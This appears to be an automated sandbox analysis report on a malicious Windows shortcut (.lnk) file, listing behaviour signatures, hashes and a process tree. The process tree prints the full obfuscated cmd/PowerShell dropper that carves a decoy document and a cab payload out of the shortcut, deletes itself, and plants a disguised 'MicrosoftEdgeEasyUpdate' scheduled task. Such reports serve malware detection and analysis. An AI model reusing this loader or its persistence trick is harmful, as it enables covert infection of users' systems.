Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
11/06/2024, 04:49
Static task
static1
Behavioral task
behavioral1
Sample
00b6a18a47bdecbf3f97e0a9188e0080a59d87beb4002e8775b036ddee978d37.lnk
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
00b6a18a47bdecbf3f97e0a9188e0080a59d87beb4002e8775b036ddee978d37.lnk
Resource
win10v2004-20240426-en
General
-
Target
00b6a18a47bdecbf3f97e0a9188e0080a59d87beb4002e8775b036ddee978d37.lnk
-
Size
33.0MB
-
MD5
cfffb45df8f05d1cb5d9d95fd5a83e9e
-
SHA1
4f069b3c3d4ecf90a7f8a3836ac957dfcd90e944
-
SHA256
00b6a18a47bdecbf3f97e0a9188e0080a59d87beb4002e8775b036ddee978d37
-
SHA512
5426eb64c10ee748ab2ce0aad3d2b22045c837d6aff3e6da64b9bf9645ea99ca33ab6f7d92de924996eb7879ef65e7bcb607f621bd0483d592a8778e7919a319
-
SSDEEP
768:vgAPVV/DKgF0JS3EaxNvnIBzHUUYNxHW0onSHzeN6ZC+v1ElH5qwpf2NyDkLmRvN:vtPu35RTnnSHzeNcfSfy6RvN
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 3352 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation cmd.exe -
Deletes itself 1 IoCs
pid Process 3352 powershell.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File opened for modification C:\Windows\LOGS\DPX\setuperr.log expand.exe File opened for modification C:\Windows\LOGS\DPX\setupact.log expand.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5092 schtasks.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000_Classes\Local Settings OpenWith.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3352 powershell.exe 3352 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3352 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2252 OpenWith.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 740 wrote to memory of 2480 740 cmd.exe 81 PID 740 wrote to memory of 2480 740 cmd.exe 81 PID 740 wrote to memory of 2480 740 cmd.exe 81 PID 2480 wrote to memory of 3352 2480 cmd.exe 82 PID 2480 wrote to memory of 3352 2480 cmd.exe 82 PID 2480 wrote to memory of 3352 2480 cmd.exe 82 PID 3352 wrote to memory of 3756 3352 powershell.exe 88 PID 3352 wrote to memory of 3756 3352 powershell.exe 88 PID 3352 wrote to memory of 3756 3352 powershell.exe 88 PID 3352 wrote to memory of 3872 3352 powershell.exe 89 PID 3352 wrote to memory of 3872 3352 powershell.exe 89 PID 3352 wrote to memory of 3872 3352 powershell.exe 89 PID 3872 wrote to memory of 5092 3872 cmd.exe 90 PID 3872 wrote to memory of 5092 3872 cmd.exe 90 PID 3872 wrote to memory of 5092 3872 cmd.exe 90
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\00b6a18a47bdecbf3f97e0a9188e0080a59d87beb4002e8775b036ddee978d37.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:740 -
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /q /c Set a4qw7afej=etodrpyswhnli && call %a4qw7afej:~5,1%%a4qw7afej:~2,1%%a4qw7afej:~8,1%%a4qw7afej:~0,1%%a4qw7afej:~4,1%%a4qw7afej:~7,1%%a4qw7afej:~9,1%%a4qw7afej:~0,1%%a4qw7afej:~11,1%%a4qw7afej:~11,1% -%a4qw7afej:~8,1%%a4qw7afej:~12,1%%a4qw7afej:~10,1%%a4qw7afej:~3,1%%a4qw7afej:~2,1%%a4qw7afej:~8,1%%a4qw7afej:~7,1%%a4qw7afej:~1,1%%a4qw7afej:~6,1%%a4qw7afej:~11,1%%a4qw7afej:~0,1% %a4qw7afej:~9,1%%a4qw7afej:~12,1%%a4qw7afej:~3,1%%a4qw7afej:~3,1%%a4qw7afej:~0,1%%a4qw7afej:~10,1% "$NiQttN1 = Get-Location;if($NiQttN1 -Match 'System32' -or $NiQttN1 -Match 'Program Files') {$NiQttN1 = 'C:\Users\Admin\AppData\Local\Temp'};$W7plh7D3zZI=@('.lnk');$urhLT9eZ3Vc = Get-ChildItem -Path $NiQttN1 -Recurse *.* -File | where {$_.extension -in $W7plh7D3zZI} | where-object {$_.length -eq 0x0210CCCC} | Select-Object -ExpandProperty FullName;$aqucL5hpsgw_ = New-Object System.IO.FileStream($urhLT9eZ3Vc, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$aqucL5hpsgw_.Seek(0x00001A0D, [System.IO.SeekOrigin]::Begin);$cqcRL0PBMTfs = New-Object byte[] 0x0000ABF6;$aqucL5hpsgw_.Read($cqcRL0PBMTfs, 0, 0x0000ABF6);$smRWm5tMSPXA = $urhLT9eZ3Vc.replace('.lnk','.hwpx');sc $smRWm5tMSPXA $cqcRL0PBMTfs -Encoding Byte;& $smRWm5tMSPXA;$aqucL5hpsgw_.Seek(0x0000C603, [System.IO.SeekOrigin]::Begin);$pyZmuKvG=New-Object byte[] 0x00000680;$aqucL5hpsgw_.Read($pyZmuKvG, 0, 0x00000680);$aqucL5hpsgw_.Close();Remove-Item -Path $urhLT9eZ3Vc -Force;$xGE_47GiT6=$env:programdata + '\MicrosoftEdge';mkdir $xGE_47GiT6;$oyYsDBuAJ=$xGE_47GiT6 + '\gewcdqa.c' + 'ab';sc $oyYsDBuAJ $pyZmuKvG -Encoding Byte;expand $oyYsDBuAJ -f:* $xGE_47GiT6;$fXoeoYo=$xGE_47GiT6 + '\parkonA.b' + 'at';&$fXoeoYo;Remove-Item -Path $oyYsDBuAJ -Force;"2⤵
- Suspicious use of WriteProcessMemory
PID:2480 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden "$NiQttN1 = Get-Location;if($NiQttN1 -Match 'System32' -or $NiQttN1 -Match 'Program Files') {$NiQttN1 = 'C:\Users\Admin\AppData\Local\Temp'};$W7plh7D3zZI=@('.lnk');$urhLT9eZ3Vc = Get-ChildItem -Path $NiQttN1 -Recurse *.* -File | where {$_.extension -in $W7plh7D3zZI} | where-object {$_.length -eq 0x0210CCCC} | Select-Object -ExpandProperty FullName;$aqucL5hpsgw_ = New-Object System.IO.FileStream($urhLT9eZ3Vc, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$aqucL5hpsgw_.Seek(0x00001A0D, [System.IO.SeekOrigin]::Begin);$cqcRL0PBMTfs = New-Object byte[] 0x0000ABF6;$aqucL5hpsgw_.Read($cqcRL0PBMTfs, 0, 0x0000ABF6);$smRWm5tMSPXA = $urhLT9eZ3Vc.replace('.lnk','.hwpx');sc $smRWm5tMSPXA $cqcRL0PBMTfs -Encoding Byte;& $smRWm5tMSPXA;$aqucL5hpsgw_.Seek(0x0000C603, [System.IO.SeekOrigin]::Begin);$pyZmuKvG=New-Object byte[] 0x00000680;$aqucL5hpsgw_.Read($pyZmuKvG, 0, 0x00000680);$aqucL5hpsgw_.Close();Remove-Item -Path $urhLT9eZ3Vc -Force;$xGE_47GiT6=$env:programdata + '\MicrosoftEdge';mkdir $xGE_47GiT6;$oyYsDBuAJ=$xGE_47GiT6 + '\gewcdqa.c' + 'ab';sc $oyYsDBuAJ $pyZmuKvG -Encoding Byte;expand $oyYsDBuAJ -f:* $xGE_47GiT6;$fXoeoYo=$xGE_47GiT6 + '\parkonA.b' + 'at';&$fXoeoYo;Remove-Item -Path $oyYsDBuAJ -Force;"3⤵
- Command and Scripting Interpreter: PowerShell
- Deletes itself
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3352 -
C:\Windows\SysWOW64\expand.exe"C:\Windows\system32\expand.exe" C:\ProgramData\MicrosoftEdge\gewcdqa.cab -f:* C:\ProgramData\MicrosoftEdge4⤵
- Drops file in Windows directory
PID:3756
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\MicrosoftEdge\parkonA.bat""4⤵
- Suspicious use of WriteProcessMemory
PID:3872 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 13 /tn "MicrosoftEdgeEasyUpdate" /tr "cmd /q /c \"start \"Microsoft Edge Updater\" /min \"C:\ProgramData\MicrosoftEdge\parkon.bat\" &exit\"" /f5⤵
- Creates scheduled task(s)
PID:5092
-
-
-
-
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2252
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5f772107c865925631a56fac02f0c9631
SHA1cdc8ee71f01c59c3362548f751ec2803b745c6bd
SHA256e173955f4c0d266c3a108a95eeca07c88df1810b763b1b254596e40e75177894
SHA5124efc5babb74ed98f78b6a342290c1f7645fc49c247d4eece1c2cbe6fdb25df70ce9ca78ac0929121898e180385f575f92304c3a09a8db1fcb4af43e5a4238235
-
Filesize
2KB
MD5a938e5c37311dabc48dc1d14c520b02a
SHA1db9111dbb2eef7fb3482fa014bcea90c9b3df1f5
SHA256fc13917afce9cae08c5aadfa35cf7b210208527e4d0a7f02d24eac82dc96460f
SHA512a9e8e5f93dac1e72985719e6bbd612e90459d71f4a7b0848198346d031c3777ad02f4d13a38ccb05a03a317290dc3538cb3da032e53482d1718ce083d648b09e
-
Filesize
5KB
MD50d550d3c3fcc95dc191a9cb56f8d7fea
SHA1e557278ee060b09fa227a0b9ef144e021763ecd5
SHA25616ccd83a5c3d0e686491e7f7f650a7199d6add01c25fe587bf81b1e43575f564
SHA512219d9f06cab7289935d1fc3476d41218b7910cce9fa9c60eda129d430b7f6d30e58a9619cfd6f93da9b1fde3c7f7d07383ecd174fcf2c98618ac75bbb804ca60
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1KB
MD5bce6d6994700a3e05b4a22e3381a4d36
SHA16d3b8fd8c18f1daad940d3589890054fe5ff21b1
SHA256623bda38e2790240ae31383db173ded9d295aa484f653ed4f1329174bbaf6154
SHA5123dff495bfdb146ab244faefd7ea5944836bddf03732a2402f82b7d09cc45292a43f3188527c9099e216b50279507bfdadd0689c2bf44237a1cbea9123016558e